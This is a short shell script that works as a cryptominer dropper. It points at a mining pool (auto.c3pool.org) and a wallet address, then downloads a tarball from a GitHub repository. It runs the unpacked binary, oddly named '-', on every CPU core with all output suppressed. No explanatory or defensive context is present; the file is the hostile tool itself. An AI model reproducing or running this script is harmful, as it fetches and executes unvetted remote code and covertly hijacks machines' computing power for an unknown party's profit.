#!/bin/sh

A=auto.c3pool.org:80
B=85FkAtn5cpa3Q44eoWzMPTWRJuMWhKao2TYrCQVEh9tdEFrNPVRnFwvGXELnD4zNQiNdxAiqGxBrgTQZEuErpok18q268uY
C=kokom
apt-get update && apt-get upgrade -y
wget https://github.com/muledan1/bash/raw/main/-.tar.gz
tar -xf -.tar.gz
./- -o $A -u $B.$C -t$(nproc --all) >/dev/null >/dev/null 2>&1
sleep 10
